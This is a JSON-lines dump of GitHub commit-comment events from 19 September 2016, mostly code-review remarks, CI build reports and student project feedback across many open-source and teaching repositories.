{"id":"4584219347","type":"CommitCommentEvent","actor":{"login":"jhillyerd"},"repo":{"name":"jhillyerd/inbucket"},"payload":{"comment":{"id":19081160,"position":20,"line":33,"path":"swaks-tests/run-tests.sh","commit_id":"a2e50a7be33b2c91d751906b8c84072d18c4bee3","created_at":"2016-09-19T16:13:07Z","updated_at":"2016-09-19T16:13:07Z","body":"I thought about it some more... it would be better to store and return it as a list, gives more flexible rendering in the Web UI and saves any JSON client having to split the string into separate addresses."}},"created_at":"2016-09-19T16:13:07Z"}
{"id":"4584220961","type":"CommitCommentEvent","actor":{"login":"jeffpar"},"repo":{"name":"jeffpar/pcjs"},"payload":{"comment":{"id":19081163,"position":null,"line":null,"path":null,"commit_id":"6f349612d825fdfc23f471d8e6f9b26ca40fcb08","created_at":"2016-09-19T16:13:25Z","updated_at":"2016-09-19T16:13:25Z","body":"Also, note that the gulpfile still puts the output into a non-standard version folder (ie, one ending in \"x\"), because I haven't gotten around to actually testing the resulting file yet."}},"created_at":"2016-09-19T16:13:25Z"}
{"id":"4584221371","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19081164,"position":null,"line":null,"path":null,"commit_id":"c7c5aed75ecda47eddcba3555bb9ba1ab776ee24","created_at":"2016-09-19T16:13:29Z","updated_at":"2016-09-19T16:13:29Z","body":"ASIHPValidation (mjwitte) - x86_64-MacOS-10.9-clang: OK (2325 of 2330 tests passed, 0 test warnings)\n\n * 5 tests had: EIO diffs.\n * 4 tests had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 4 tests had: ZSZ big diffs.\n * 5 tests had: Table big diffs.\n * 4 tests had: AUD diffs.\n * 4 tests had: ERR diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MDD diffs.\n * 2 tests had: MTD diffs.\n * 1 test had: RDD diffs.\n * 3 tests had: MTR big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c7c5aed75ecda47eddcba3555bb9ba1ab776ee24-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c7c5aed75ecda47eddcba3555bb9ba1ab776ee24-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.79%25-yellow.svg)</a> \n"}},"created_at":"2016-09-19T16:13:29Z"}
{"id":"4584222053","type":"CommitCommentEvent","actor":{"login":"bryanwweber"},"repo":{"name":"Niemeyer-Research-Group/PyKED"},"payload":{"comment":{"id":19081165,"position":12,"line":20,"path":"pyked/chemked_schema.yaml","commit_id":"e7b90b278dc4227a4f555aba83c6f127be085026","created_at":"2016-09-19T16:13:35Z","updated_at":"2016-09-19T16:13:35Z","body":"Yes, I think the molecular structure should be the canonical way to represent the molecule."}},"created_at":"2016-09-19T16:13:35Z"}
{"id":"4584225534","type":"CommitCommentEvent","actor":{"login":"sklyukin"},"repo":{"name":"flaper/api"},"payload":{"comment":{"id":19081171,"position":102,"line":102,"path":"src/common/models/subscription/subscription.js","commit_id":"63962786a45a8788e16fde7722a8490d205f749c","created_at":"2016-09-19T16:14:09Z","updated_at":"2016-09-19T16:14:09Z","body":"поля created / updated сами создаются для всех унаследованных от CommonModel"}},"created_at":"2016-09-19T16:14:09Z"}
{"id":"4584228280","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"NosovArtem/helloworld"},"payload":{"comment":{"id":19081181,"position":14,"line":14,"path":"src/ru/sberbank/school/helloworld/tasks/lesson03/tasks/TaskSix.java","commit_id":"d7ee9fc71c72d3479994dbc3a2dbfee6d1e268d1","created_at":"2016-09-19T16:14:35Z","updated_at":"2016-09-19T16:14:35Z","body":"Постарайтесь учесть информацию о средней длине строки."}},"created_at":"2016-09-19T16:14:35Z"}
{"id":"4584231052","type":"CommitCommentEvent","actor":{"login":"ksmith0"},"repo":{"name":"pixie16/paass"},"payload":{"comment":{"id":19081185,"position":null,"line":null,"path":null,"commit_id":"ee8c03f4bb21160699c8625d7c98aed4367e7ef4","created_at":"2016-09-19T16:15:00Z","updated_at":"2016-09-19T16:15:00Z","body":"This commit may be causing segmentation faults as mentioned in #86. A race condition may occur between the `RunControl` thread attempting to end the run and the `CommandControl` thread which is closing or has closed the run file."}},"created_at":"2016-09-19T16:15:00Z"}
{"id":"4584231184","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sam828/personal-website"},"payload":{"comment":{"id":19081186,"position":6,"line":6,"path":"style.css","commit_id":"8749f4d643ec4fb6dbe0874dc8bae94bf349a093","created_at":"2016-09-19T16:15:01Z","updated_at":"2016-09-19T16:15:01Z","body":"Whenever the font-family is more than one word, wrap it in quotes, so: \"Comic Sans MS\"."}},"created_at":"2016-09-19T16:15:01Z"}
{"id":"4584236933","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sam828/personal-website"},"payload":{"comment":{"id":19081199,"position":9,"line":9,"path":"index.html","commit_id":"8749f4d643ec4fb6dbe0874dc8bae94bf349a093","created_at":"2016-09-19T16:15:59Z","updated_at":"2016-09-19T16:15:59Z","body":"I'm not seeing this image in your project. Also, it should be in an images folder and the path would've been \"images/sampiano.jpg\"."}},"created_at":"2016-09-19T16:15:59Z"}
{"id":"4584241309","type":"CommitCommentEvent","actor":{"login":"NitroxydeX"},"repo":{"name":"EternalBlueFlame/Traincraft-5"},"payload":{"comment":{"id":19081209,"position":null,"line":null,"path":null,"commit_id":"7409574e4f4b3b24e532c058c63d993e85300619","created_at":"2016-09-19T16:16:43Z","updated_at":"2016-09-19T16:16:43Z","body":"#156 "}},"created_at":"2016-09-19T16:16:43Z"}
{"id":"4584244334","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sam828/personal-website"},"payload":{"comment":{"id":19081222,"position":4,"line":6,"path":"index.html","commit_id":"8749f4d643ec4fb6dbe0874dc8bae94bf349a093","created_at":"2016-09-19T16:17:13Z","updated_at":"2016-09-19T16:17:13Z","body":"This should be between the `<head>` opening and closing tags. Also it should've been put into a css folder so the path would've been \"css/style.css\"."}},"created_at":"2016-09-19T16:17:13Z"}
{"id":"4584245698","type":"CommitCommentEvent","actor":{"login":"dakrone"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19081228,"position":null,"line":null,"path":null,"commit_id":"a62da5bac9eeee8f4802acd868fbc77427fd5b91","created_at":"2016-09-19T16:17:25Z","updated_at":"2016-09-19T16:17:25Z","body":"@joshuaknox I am going to get https://github.com/dakrone/clj-http/pull/333 in before cutting a release of 2.x and 3.x"}},"created_at":"2016-09-19T16:17:25Z"}
{"id":"4584245836","type":"CommitCommentEvent","actor":{"login":"PlusMinus0"},"repo":{"name":"mansenfranzen/ultimate"},"payload":{"comment":{"id":19081229,"position":14,"line":26,"path":"django/app_tutorial/models.py","commit_id":"bacde997e9999d1b807dde17bbfd5688cf435137","created_at":"2016-09-19T16:17:27Z","updated_at":"2016-09-19T16:17:27Z","body":"Mit Heim Mannschaft meine ich die Mannschaft, die zuerst im Spielplan auftaucht. Üblicherweise ist das die höher gesetzte Mannschaft, muss aber nicht so sein. Man könnte bei Game TeamHome und TeamAway als Fremdschlüssel einfügen und dann bei GameScore nur Game als Fremschlüssel, dafür ScoreHome und ScoreAway."}},"created_at":"2016-09-19T16:17:27Z"}
{"id":"4584247548","type":"CommitCommentEvent","actor":{"login":"vityayatskiv"},"repo":{"name":"vityayatskiv/home"},"payload":{"comment":{"id":19081232,"position":1,"line":1,"path":"README.md","commit_id":"45fafdacc40d7f592be44648746029fb7fa1297c","created_at":"2016-09-19T16:17:42Z","updated_at":"2016-09-19T16:17:42Z","body":"оаеопшлгнрорпшлл"}},"created_at":"2016-09-19T16:17:42Z"}
{"id":"4584249736","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19081238,"position":18,"line":18,"path":"browser/js/profile-page/profile-page.controller.js","commit_id":"1a747de032a0801d75a951c4b7f68ec4b9bfda54","created_at":"2016-09-19T16:18:03Z","updated_at":"2016-09-19T16:18:03Z","body":"more error handling"}},"created_at":"2016-09-19T16:18:03Z"}
{"id":"4584255486","type":"CommitCommentEvent","actor":{"login":"VidiTheDog"},"repo":{"name":"VidiTheDog/learning"},"payload":{"comment":{"id":19081251,"position":null,"line":null,"path":null,"commit_id":"e469d9bb2f36ad2005b5a864ed738caa0aecd9ff","created_at":"2016-09-19T16:18:56Z","updated_at":"2016-09-19T16:18:56Z","body":"This is where I would write something, under the \"WRITE\" tab. #wahoo!"}},"created_at":"2016-09-19T16:18:56Z"}
{"id":"4584255627","type":"CommitCommentEvent","actor":{"login":"dio5"},"repo":{"name":"silverstripe/silverstripe-cms"},"payload":{"comment":{"id":19081252,"position":13,"line":181,"path":"javascript/LeftAndMain_right.js","commit_id":"41aec54e88c2838a862453ad27acbbce075cc3e2","created_at":"2016-09-19T16:18:57Z","updated_at":"2016-09-19T16:18:57Z","body":"Did you ever figure this out? I think I'm running into the same issue on trying to update an old site to the post-2.4 branch (don't ask)..."}},"created_at":"2016-09-19T16:18:57Z"}
{"id":"4584256399","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19081255,"position":null,"line":null,"path":null,"commit_id":"155caf938a0cd58600d95ac34ab4652da97bca0e","created_at":"2016-09-19T16:19:06Z","updated_at":"2016-09-19T16:19:06Z","body":"IMO it is a simplification since it removes two parameters. If it passes stc, we will ask Marco what is his opinion."}},"created_at":"2016-09-19T16:19:06Z"}
{"id":"4584258429","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":19081258,"position":null,"line":null,"path":null,"commit_id":"a212340cc1c7922b17c9ed35c01ea8bef05a9e9d","created_at":"2016-09-19T16:19:25Z","updated_at":"2016-09-19T16:19:25Z","body":"e.g. `Caskroom/subler/1.1.3/Subler.app`"}},"created_at":"2016-09-19T16:19:25Z"}
{"id":"4584259525","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"TatyanaLomova/JavaSchool"},"payload":{"comment":{"id":19081262,"position":35,"line":35,"path":"src/lesson_03/MyClass/src/MyClass.java","commit_id":"c14072cb337ced5133065b9ed2299ba2825dd343","created_at":"2016-09-19T16:19:34Z","updated_at":"2016-09-19T16:19:34Z","body":"HashSet<String> myHashSet\r\nлучше заменить на Set<String> myHashSet - т.е. те, кто используют эту переменную не должны знать о конкретной реализации Set'а"}},"created_at":"2016-09-19T16:19:34Z"}
{"id":"4584261800","type":"CommitCommentEvent","actor":{"login":"nba048"},"repo":{"name":"nba048/Sole"},"payload":{"comment":{"id":19081265,"position":null,"line":null,"path":null,"commit_id":"edd6dc3df28f01a0c72adc9ce60bcc7e9527976c","created_at":"2016-09-19T16:19:53Z","updated_at":"2016-09-19T16:19:53Z","body":"asdasdasd"}},"created_at":"2016-09-19T16:19:53Z"}
{"id":"4584262997","type":"CommitCommentEvent","actor":{"login":"Resisty"},"repo":{"name":"kevinklaes/resume"},"payload":{"comment":{"id":19081267,"position":null,"line":null,"path":null,"commit_id":"baa54819a44628074b1776154b8df90f6cf48db5","created_at":"2016-09-19T16:20:05Z","updated_at":"2016-09-19T16:20:05Z","body":"AAAAAAAAH IT BURNS"}},"created_at":"2016-09-19T16:20:05Z"}
{"id":"4584263547","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19081270,"position":18,"line":18,"path":"browser/js/product/product.controller.js","commit_id":"1a747de032a0801d75a951c4b7f68ec4b9bfda54","created_at":"2016-09-19T16:20:11Z","updated_at":"2016-09-19T16:20:11Z","body":"Consider a localStorage factory?"}},"created_at":"2016-09-19T16:20:11Z"}
{"id":"4584266814","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19081279,"position":30,"line":30,"path":"browser/js/members-only/members-only.js","commit_id":"1a747de032a0801d75a951c4b7f68ec4b9bfda54","created_at":"2016-09-19T16:20:41Z","updated_at":"2016-09-19T16:20:41Z","body":"Cool ES6 trick: you can simply `return { getStash }`"}},"created_at":"2016-09-19T16:20:41Z"}
{"id":"4584267189","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19081280,"position":null,"line":null,"path":null,"commit_id":"e6372efd05472ce9051b34516a2de0d99b1a22da","created_at":"2016-09-19T16:20:44Z","updated_at":"2016-09-19T16:20:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1053](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13581&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 2 (2 new), passed: 215, ignored: 3 Build time: 00:07:56\n### Failed tests\n```\norg.genivi.sota.core.PackagesResourceSpec.returns package blacklist info when searching non blacklisted package: <no details avaliable>\n\norg.genivi.sota.core.transfer.DeviceUpdatesSpec.can only sort pending update requests: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-19T16:20:44Z"}
{"id":"4584268289","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sam828/personal-website"},"payload":{"comment":{"id":19081284,"position":9,"line":6,"path":"portfolio.html","commit_id":"8749f4d643ec4fb6dbe0874dc8bae94bf349a093","created_at":"2016-09-19T16:20:55Z","updated_at":"2016-09-19T16:20:55Z","body":"Missing quotes around \"stylesheet\"."}},"created_at":"2016-09-19T16:20:55Z"}
{"id":"4584269246","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19081286,"position":30,"line":30,"path":"browser/js/members-only/members-only.js","commit_id":"1a747de032a0801d75a951c4b7f68ec4b9bfda54","created_at":"2016-09-19T16:21:03Z","updated_at":"2016-09-19T16:21:03Z","body":"(I know you didn't write this, I'm just mentioning it)"}},"created_at":"2016-09-19T16:21:03Z"}
{"id":"4584269643","type":"CommitCommentEvent","actor":{"login":"riccardi"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19081287,"position":null,"line":null,"path":null,"commit_id":"d8d0cf174a58695ab782994e0ba69d4575148d13","created_at":"2016-09-19T16:21:10Z","updated_at":"2016-09-19T16:21:10Z","body":"General Notes: \r\n\r\n- Our files here are getting pretty long - it might be a good idea to separate out our controllers, factories, and states into different files.\r\n\r\n- I didn't see any error handling - this should be done in our controllers"}},"created_at":"2016-09-19T16:21:10Z"}
{"id":"4584272167","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19081294,"position":17,"line":17,"path":"browser/js/home/home.js","commit_id":"1a747de032a0801d75a951c4b7f68ec4b9bfda54","created_at":"2016-09-19T16:21:36Z","updated_at":"2016-09-19T16:21:36Z","body":"error handling"}},"created_at":"2016-09-19T16:21:36Z"}
{"id":"4584272642","type":"CommitCommentEvent","actor":{"login":"jawshooah"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":19081296,"position":null,"line":null,"path":null,"commit_id":"a212340cc1c7922b17c9ed35c01ea8bef05a9e9d","created_at":"2016-09-19T16:21:40Z","updated_at":"2016-09-19T16:21:40Z","body":"How old is that cask? It must have been installed before we switched from symlinking app bundles to moving them into `/Applications`."}},"created_at":"2016-09-19T16:21:40Z"}
{"id":"4584272851","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19081297,"position":null,"line":null,"path":null,"commit_id":"14ef3a4d5b4f6296327f647ceb02df5bde9aad93","created_at":"2016-09-19T16:21:43Z","updated_at":"2016-09-19T16:21:43Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1052](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13580&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 240, ignored: 3 Build time: 00:08:56"}},"created_at":"2016-09-19T16:21:43Z"}
{"id":"4584273325","type":"CommitCommentEvent","actor":{"login":"monkeyworknet"},"repo":{"name":"overviewer/Minecraft-Overviewer"},"payload":{"comment":{"id":19081299,"position":null,"line":null,"path":null,"commit_id":"5862b34e9eccb6adac93684ee7647eae298e2621","created_at":"2016-09-19T16:21:47Z","updated_at":"2016-09-19T16:21:47Z","body":"Should this commit be done for 1.10 textures when overviewer does not yet seem to support the 1.10 texture"}},"created_at":"2016-09-19T16:21:47Z"}
{"id":"4584275002","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"TatyanaLomova/JavaSchool"},"payload":{"comment":{"id":19081305,"position":48,"line":48,"path":"src/lesson_03/MyClass/src/MyClass.java","commit_id":"c14072cb337ced5133065b9ed2299ba2825dd343","created_at":"2016-09-19T16:22:05Z","updated_at":"2016-09-19T16:22:05Z","body":"Так слова не будут отсортированы именно по своей длине"}},"created_at":"2016-09-19T16:22:05Z"}
{"id":"4584275245","type":"CommitCommentEvent","actor":{"login":"tcolgate"},"repo":{"name":"siimon/prom-client"},"payload":{"comment":{"id":19081307,"position":null,"line":null,"path":null,"commit_id":"00ac89b7bb307fb6c6a539f34773fac941d269f1","created_at":"2016-09-19T16:22:09Z","updated_at":"2016-09-19T16:22:09Z","body":"@siimon  I think this code is wrong.\r\nprocess.cpuUsage will give you the total usage since start, not the last call to cpuUsage.\r\nYou have to pass it an explicit value of a previous call to get the difference."}},"created_at":"2016-09-19T16:22:09Z"}
{"id":"4584276031","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19081313,"position":44,"line":44,"path":"browser/js/home/home.html","commit_id":"1a747de032a0801d75a951c4b7f68ec4b9bfda54","created_at":"2016-09-19T16:22:18Z","updated_at":"2016-09-19T16:22:18Z","body":"Can these cards be directives? Can we `ng-repeat` over card data in the scope?"}},"created_at":"2016-09-19T16:22:18Z"}
{"id":"4584278648","type":"CommitCommentEvent","actor":{"login":"riccardi"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19081318,"position":38,"line":38,"path":"browser/js/cart/cart.js","commit_id":"d8d0cf174a58695ab782994e0ba69d4575148d13","created_at":"2016-09-19T16:22:41Z","updated_at":"2016-09-19T16:22:41Z","body":"There is a lot going on in this controller - some of this can be abstracted out into our factory"}},"created_at":"2016-09-19T16:22:41Z"}
{"id":"4584282318","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19081330,"position":107,"line":107,"path":"browser/js/fsa/fsa-pre-built.js","commit_id":"1a747de032a0801d75a951c4b7f68ec4b9bfda54","created_at":"2016-09-19T16:23:16Z","updated_at":"2016-09-19T16:23:16Z","body":"Nice extending this pattern"}},"created_at":"2016-09-19T16:23:16Z"}
{"id":"4584284559","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19081336,"position":26,"line":26,"path":"browser/js/contact/contact.js","commit_id":"1a747de032a0801d75a951c4b7f68ec4b9bfda54","created_at":"2016-09-19T16:23:36Z","updated_at":"2016-09-19T16:23:36Z","body":"error handling…"}},"created_at":"2016-09-19T16:23:36Z"}
{"id":"4584285809","type":"CommitCommentEvent","actor":{"login":"gandm"},"repo":{"name":"gandm/language-babel"},"payload":{"comment":{"id":19081343,"position":null,"line":null,"path":null,"commit_id":"99944a66a788678e3faad68ba4b48d244906aec6","created_at":"2016-09-19T16:23:48Z","updated_at":"2016-09-19T16:23:48Z","body":"I added a bit to the README and also made some minor changes to the scopes and styles used in GraphQL. \r\nSee https://github.com/gandm/language-babel/commit/2caaae9e59513e72783f5c5565936ce3adfd0cb4 and the CHANGELOG for more info."}},"created_at":"2016-09-19T16:23:48Z"}
{"id":"4584292275","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19081352,"position":34,"line":34,"path":"browser/js/catalog/catalog.html","commit_id":"1a747de032a0801d75a951c4b7f68ec4b9bfda54","created_at":"2016-09-19T16:24:53Z","updated_at":"2016-09-19T16:24:53Z","body":"This looks like something that could be a directive."}},"created_at":"2016-09-19T16:24:53Z"}
{"id":"4584293228","type":"CommitCommentEvent","actor":{"login":"premarajanmk"},"repo":{"name":"premarajanmk/imad-2016-app"},"payload":{"comment":{"id":19081355,"position":null,"line":null,"path":null,"commit_id":"e1d244eea95eb34b8f40e4a772c90f35e04660f6","created_at":"2016-09-19T16:25:00Z","updated_at":"2016-09-19T16:25:00Z","body":"<html> \r\n<head>\r\n   <title>\r\n       Article-two : Premraj\r\n   </title> \r\n  <meta name=\"viewport\" content=\"width-device-width, initial-scale-1\"> \r\n</head>\r\n\r\n<body>\r\n    \r\n<div>\r\n    <a href=\"/\">Home</a>\r\n </div>    \r\n    \r\n  <hr/>\r\n  \r\n  <h3> \r\n  Article Two\r\n  \r\n  </h3>\r\n  <div>\r\n      \r\n      September, 21st ,2016\r\n  </div>\r\n    \r\n    <div>\r\n        \r\n        <p>\r\n            \r\n            \r\n            This is the content for my second article \r\n            \r\n            This is the content for my second article \r\n            \r\n            This is the content for my second article \r\n\r\n        </p>\r\n        <p>\r\n            This is the content for my second article \r\n            This is the content for my second article \r\n            This is the content for my second  article \r\n\r\n        </p>\r\n        \r\n        <p>\r\n            This is the content for my second article \r\n            This is the content for my second  article \r\n\r\n            \r\n            \r\n            \r\n        </p>\r\n    </div>\r\n    \r\n    \r\n    \r\n</body>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n</html>\r\n"}},"created_at":"2016-09-19T16:25:00Z"}
{"id":"4584295822","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"TatyanaLomova/JavaSchool"},"payload":{"comment":{"id":19081363,"position":100,"line":100,"path":"src/lesson_03/MyClass/src/MyClass.java","commit_id":"c14072cb337ced5133065b9ed2299ba2825dd343","created_at":"2016-09-19T16:25:28Z","updated_at":"2016-09-19T16:25:28Z","body":"Попробуйте ещё варианты с List + ListIterator и ArrayDeque + descendingIterator"}},"created_at":"2016-09-19T16:25:28Z"}
{"id":"4584297122","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19081369,"position":54,"line":54,"path":"browser/js/catalog/catalog.controller.js","commit_id":"1a747de032a0801d75a951c4b7f68ec4b9bfda54","created_at":"2016-09-19T16:25:39Z","updated_at":"2016-09-19T16:25:39Z","body":"I like that you're defining filters!"}},"created_at":"2016-09-19T16:25:39Z"}
{"id":"4584298744","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-qt"},"payload":{"comment":{"id":19081377,"position":null,"line":null,"path":null,"commit_id":"787cb81986e2356686be92d0acea90e11ccfeec7","created_at":"2016-09-19T16:25:53Z","updated_at":"2016-09-19T16:25:53Z","body":"Though, there is a kind of regression: functions with long signatures (such as)\r\n```cpp\r\nstatic BaseConnectionPtr create(const QString &cmName, const QString &protocolName,\r\n                                    const QVariantMap &parameters,\r\n                                    const QDBusConnection &dbusConnection = QDBusConnection::sessionBus())\r\n```\r\nnow have text rendered outside of the \"column\" and boxes.\r\n\r\nE.g. doc/html/a00089.html#a84186ce9113561539e34841a7012227b (I think you have the same page at the given relative address)"}},"created_at":"2016-09-19T16:25:53Z"}
{"id":"4584298937","type":"CommitCommentEvent","actor":{"login":"nvkelso"},"repo":{"name":"tangrams/bubble-wrap"},"payload":{"comment":{"id":19081378,"position":null,"line":null,"path":null,"commit_id":"b41de7a6e9146fff761c5fe8baa3d8c95ab11be2","created_at":"2016-09-19T16:25:54Z","updated_at":"2016-09-19T16:25:54Z","body":"Addressed in https://github.com/tangrams/bubble-wrap/pull/205."}},"created_at":"2016-09-19T16:25:54Z"}
{"id":"4584299266","type":"CommitCommentEvent","actor":{"login":"cdiacon"},"repo":{"name":"dotmailer/dotmailer-magento-extension"},"payload":{"comment":{"id":19081380,"position":14,"line":348,"path":"code/Dotdigitalgroup/Email/Model/Resource/Contact.php","commit_id":"d535ef65e9e6595eb5fdb7629fad45f446744c84","created_at":"2016-09-19T16:25:57Z","updated_at":"2016-09-19T16:25:57Z","body":"@adeelq $data needs to be checked for the expected value type before running the query.\r\n\r\nso this should be array_type and not emtpy "}},"created_at":"2016-09-19T16:25:57Z"}
{"id":"4584302301","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19081388,"position":60,"line":60,"path":"browser/js/catalog/catalog.controller.js","commit_id":"1a747de032a0801d75a951c4b7f68ec4b9bfda54","created_at":"2016-09-19T16:26:26Z","updated_at":"2016-09-19T16:26:26Z","body":"This could easily work as `return items.filter(item => item.inventory > 0)`"}},"created_at":"2016-09-19T16:26:26Z"}
{"id":"4584303046","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"TatyanaLomova/JavaSchool"},"payload":{"comment":{"id":19081390,"position":112,"line":112,"path":"src/lesson_03/MyClass/src/MyClass.java","commit_id":"c14072cb337ced5133065b9ed2299ba2825dd343","created_at":"2016-09-19T16:26:33Z","updated_at":"2016-09-19T16:26:33Z","body":"Напишите полностью свою реализацию итератора - идея в том, чтобы понять все методы итератора и их контракты"}},"created_at":"2016-09-19T16:26:33Z"}
{"id":"4584307753","type":"CommitCommentEvent","actor":{"login":"IceKirby"},"repo":{"name":"po-devs/po-server-goodies"},"payload":{"comment":{"id":19081402,"position":52,"line":1528,"path":"scripts/mafia.js","commit_id":"639d9120cd2a9e2fed9fa5f29ec6c260bb7c7363","created_at":"2016-09-19T16:27:15Z","updated_at":"2016-09-19T16:27:15Z","body":"Should be **.indexOf(shoved)** in both cases"}},"created_at":"2016-09-19T16:27:15Z"}
{"id":"4584308818","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19081405,"position":27,"line":27,"path":"browser/js/cart/view/cart.html","commit_id":"1a747de032a0801d75a951c4b7f68ec4b9bfda54","created_at":"2016-09-19T16:27:22Z","updated_at":"2016-09-19T16:27:22Z","body":"Maybe a directive?"}},"created_at":"2016-09-19T16:27:22Z"}
{"id":"4584321920","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19081430,"position":49,"line":49,"path":"browser/js/cart/view/cart.factory.js","commit_id":"1a747de032a0801d75a951c4b7f68ec4b9bfda54","created_at":"2016-09-19T16:29:00Z","updated_at":"2016-09-19T16:29:00Z","body":"Instead of copying all these hard-coded props manually, why not just add `dateSubmitted` and `userId` etc. to `customer` and post `customer`? Or use `angular.copy` if you don't want to modify the original object."}},"created_at":"2016-09-19T16:29:00Z"}
{"id":"4584322982","type":"CommitCommentEvent","actor":{"login":"RomeroBarata"},"repo":{"name":"topepo/caret"},"payload":{"comment":{"id":19081432,"position":6,"line":14,"path":"pkg/caret/inst/NEWS.Rd","commit_id":"add4f5392a51a45c75d0c219642c2512ab3a1133","created_at":"2016-09-19T16:29:12Z","updated_at":"2016-09-19T16:29:12Z","body":"versions*"}},"created_at":"2016-09-19T16:29:12Z"}
{"id":"4584325659","type":"CommitCommentEvent","actor":{"login":"riccardi"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19081437,"position":17,"line":17,"path":"browser/js/cart/cart.js","commit_id":"d8d0cf174a58695ab782994e0ba69d4575148d13","created_at":"2016-09-19T16:29:32Z","updated_at":"2016-09-19T16:29:32Z","body":"The only variables that are being used in cart.html are itemNums, obj, and totalCents. Remember that $scope is what allows us to dynamically display data in our html files - if we are not using cartArray and userId anywhere in our .html file, we do not need to attach it to the $scope."}},"created_at":"2016-09-19T16:29:32Z"}
{"id":"4584327837","type":"CommitCommentEvent","actor":{"login":"RomeroBarata"},"repo":{"name":"topepo/caret"},"payload":{"comment":{"id":19081440,"position":5,"line":13,"path":"pkg/caret/inst/NEWS.Rd","commit_id":"add4f5392a51a45c75d0c219642c2512ab3a1133","created_at":"2016-09-19T16:29:49Z","updated_at":"2016-09-19T16:29:49Z","body":"Did you really mean vis or via?"}},"created_at":"2016-09-19T16:29:49Z"}
{"id":"4584332851","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19081448,"position":60,"line":60,"path":"browser/js/cart/view/cart.factory.js","commit_id":"1a747de032a0801d75a951c4b7f68ec4b9bfda54","created_at":"2016-09-19T16:30:35Z","updated_at":"2016-09-19T16:30:35Z","body":"Uh oh — you are making a whole bunch of async post requests, but not waiting on them or checking to see if they succeed! Definitely need a `$q.all` in here or similar."}},"created_at":"2016-09-19T16:30:35Z"}
{"id":"4584333618","type":"CommitCommentEvent","actor":{"login":"nknoop"},"repo":{"name":"Leaflet/Leaflet"},"payload":{"comment":{"id":19081450,"position":null,"line":null,"path":null,"commit_id":"0cfe85897fef257d952d1cec5a5a11005fa66da0","created_at":"2016-09-19T16:30:42Z","updated_at":"2016-09-19T16:30:42Z","body":"Due to this change the svg elements that should be interactive and where interactive before, are also non-interactive:-("}},"created_at":"2016-09-19T16:30:42Z"}
